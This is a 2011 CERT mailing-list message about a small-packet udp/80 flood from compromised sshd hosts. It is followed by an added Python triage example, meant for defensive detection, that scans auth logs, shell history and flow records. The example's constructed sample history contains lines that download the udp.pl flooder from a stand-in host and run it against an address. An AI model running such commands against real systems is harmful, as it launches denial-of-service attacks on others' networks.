[nsp-sec] 7Mpps udp/80 29bpp attack against 82.130.16.98

Harri Sylvander harri.sylvander at csc.fi
Fri Jul 1 02:50:27 EDT 2011


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

On Fri, Jul 01, 2011 at 08:50:51AM +0300, Pekka Savola wrote:
>> There was just a brief 7Mpps udp/80 29bpp DoS attack (145 sources)
>> against 82.130.16.98.
>>
>> Please check your hosts.  The timestamp is UTC, the third row is
>> the duration and the last number is the number of packets (in
>> millions) or if there is no dot, in absolute.
>
> Yesterday, the very same kind of 7Mpps attack re-occurred against
> the same target.  This time with 100 sources.  76 earlier hosts were
> no longer participating.  There were 32 new sources.

A quick addition to Pekka's comments. During the previous round of
DoS attacks the folks who replied to our abuse mails confirmed that
they found compromised credentials (not necessarily root privs) and
unauthorized logins to boxes running sshd.

The traffic profile is similar in this case, but the attacker is using
more hosts per DoS than previously (a couple to a handful). But if it
is the same miscreant, then expect:

* reported IP addresses to be legit
* the tool used to be udp.pl
* the credentials of one or more users on said box to be known by the
  attacker
* logs (ssh auth logs, .bash_history, etc) of the fool's actions to
  be available.


Cheers,

- -hts

- --
Harri Sylvander, Funet CERT, CSC - IT Center for Science Ltd.
P.O. Box 405, 02101 Espoo, Finland, tel +358 9 457 2082
CSC is the Finnish IT Center for Science, http://www.csc.fi/
e-mail: harri.sylvander at csc.fi
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (Darwin)

iD8DBQFODW4zAhrm/iIgvswRAofcAKClGcV/DQJ2IQS/8PQi57I9Wm8luQCaAmIG
pgG5wWstRFmNw9B19DItxb8=
=jZQj
-----END PGP SIGNATURE-----
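The message above tells recipients what to look for on a host named in the report: a successful sshd login on a known user account, shell history mentioning the udp.pl flooder, and outbound udp/80 traffic with roughly 29 bytes per packet. The following is an added example of that triage, written for this page and not part of the original thread or any Funet CERT tooling. Every log line, history line and flow record in it is constructed for illustration (RFC 5737 documentation addresses, made-up hostnames and PIDs, made-up udp.pl arguments), and the packet-rate threshold and the "longest flow duration" approximation of the attack window are assumptions, not values from the report.

```python
"""Triage helpers for the udp/80 small-packet flood described in the thread.

Added example: not code from the mailing-list message or from Funet CERT.
All sample data below is constructed; addresses are RFC 5737 documentation ranges.
"""
import re
from collections import defaultdict

# OpenSSH's syslog line for a successful login, e.g.
# "... sshd[2231]: Accepted password for www from 192.0.2.77 port 51342 ssh2"
SSHD_ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def accepted_logins(lines):
    """Return (user, ip, auth_method) for every successful sshd login in the log.

    Failed attempts and session-open lines are ignored; only "Accepted" counts.
    """
    found = []
    for line in lines:
        m = SSHD_ACCEPTED.search(line)
        if m:
            found.append((m.group("user"), m.group("ip"), m.group("method")))
    return found


def suspicious_history(lines, markers=("udp.pl",)):
    """Return shell-history lines that mention the flooder script named in the thread.

    A plain substring match is deliberate: the script is usually fetched, run and
    deleted under its own name, so all three steps show up.
    """
    return [line for line in lines if any(mk in line for mk in markers)]


def flood_candidates(flows, pps_threshold=100_000, max_bpp=40, port=80):
    """Find destinations whose aggregate udp/<port> traffic matches the profile
    (tiny packets, high packet rate) from per-flow records shaped like
    (src, dst, proto, dport, packets, bytes, duration_seconds).

    Packet rate is approximated as total packets divided by the longest
    contributing flow's duration (assumption: the flows overlap in time).
    """
    agg = defaultdict(lambda: {"packets": 0, "bytes": 0, "duration": 0.0, "sources": set()})
    for src, dst, proto, dport, packets, nbytes, duration in flows:
        if proto != "udp" or dport != port:
            continue
        a = agg[dst]
        a["packets"] += packets
        a["bytes"] += nbytes
        a["duration"] = max(a["duration"], duration)
        a["sources"].add(src)

    hits = {}
    for dst, a in agg.items():
        bpp = a["bytes"] / a["packets"]
        pps = a["packets"] / a["duration"] if a["duration"] > 0 else float("inf")
        if bpp <= max_bpp and pps >= pps_threshold:
            hits[dst] = {"pps": pps, "bpp": bpp, "sources": len(a["sources"])}
    return hits


# --- constructed sample data (not real logs) ---------------------------------
SAMPLE_AUTH_LOG = [
    "Jun 30 03:12:44 host1 sshd[2231]: Accepted password for www from 192.0.2.77 port 51342 ssh2",
    "Jun 30 03:13:02 host1 sshd[2231]: pam_unix(sshd:session): session opened for user www by (uid=0)",
    "Jun 30 04:01:10 host1 sshd[2410]: Failed password for root from 203.0.113.9 port 40011 ssh2",
    "Jun 30 04:02:51 host1 sshd[2455]: Accepted publickey for admin from 198.51.100.2 port 39872 ssh2",
]

# Made-up .bash_history of the "www" account; the udp.pl arguments are illustrative only.
SAMPLE_HISTORY = [
    "cd /tmp",
    "wget http://example.invalid/udp.pl",
    "perl udp.pl 198.51.100.7 80 0 60",
    "rm -f udp.pl",
    "exit",
]

# Three sources each sending 30M packets of 29 bytes to udp/80 over 60 s, plus two
# flows that must not match (a DNS flow and a large-packet udp/80 flow).
SAMPLE_FLOWS = [
    ("192.0.2.10", "198.51.100.7", "udp", 80, 30_000_000, 870_000_000, 60.0),
    ("192.0.2.11", "198.51.100.7", "udp", 80, 30_000_000, 870_000_000, 60.0),
    ("203.0.113.5", "198.51.100.7", "udp", 80, 30_000_000, 870_000_000, 60.0),
    ("192.0.2.10", "198.51.100.53", "udp", 53, 200, 14_000, 60.0),
    ("192.0.2.20", "198.51.100.9", "udp", 80, 1_000, 1_200_000, 60.0),
]

if __name__ == "__main__":
    for user, ip, method in accepted_logins(SAMPLE_AUTH_LOG):
        print(f"login: {user} from {ip} via {method}")
    for line in suspicious_history(SAMPLE_HISTORY):
        print(f"history: {line}")
    for dst, info in flood_candidates(SAMPLE_FLOWS).items():
        print(f"target: {dst} {info['pps']:.0f} pps, {info['bpp']:.0f} bpp, {info['sources']} sources")
```

On a real host the inputs would be /var/log/auth.log (or secure), the home directories' .bash_history files, and NetFlow or sFlow exports from the upstream router; the point of the flow check is that a 29-byte udp/80 packet stream stands out by bytes per packet long before anyone looks at absolute volume, so the bpp bound does most of the work and the pps threshold only filters noise.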